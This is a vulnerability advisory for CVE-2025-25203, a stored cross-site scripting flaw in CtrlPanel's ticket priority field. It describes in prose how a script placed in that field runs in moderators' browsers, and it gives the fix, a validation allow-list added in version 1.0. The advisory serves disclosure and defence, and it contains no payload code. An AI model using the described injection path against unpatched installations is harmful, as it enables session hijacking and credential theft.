CVE-2025-25203

A stored Cross-Site Scripting (XSS) vulnerability was identified in CtrlPanel, an open-source billing platform for hosting providers, prior to version 1.0. The flaw resides in TicketsController and Moderation/TicketsController, where the priority field during ticket creation is not validated or sanitized [1]. The code directly accepts user input for the priority field without any filtering, and the same unsanitized data is later rendered with rawColumns in the moderator panel [1].

An attacker can exploit this by crafting a ticket with a malicious payload in the priority field [1]. Since the priority value is output directly as raw HTML in the dataTable method of Moderation/TicketsController, any injected script will be executed when a moderator views the ticket list [1]. No authentication is required other than being able to create a ticket; the attacker simply submits a ticket with an XSS payload as the priority.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the moderator's browser [1]. This can lead to session hijacking, credential theft, or further attacks against the hosting panel. The vulnerability is rated High with a CVSS v3 score of 8.1.

The issue was addressed in version 1.0 via commit 393cbde, which adds proper validation (e.g., 'priority' => ['required', 'in:Low,Medium,High']) to restrict the priority field to allowed values [2]. Users should upgrade to the latest patched version to mitigate the risk.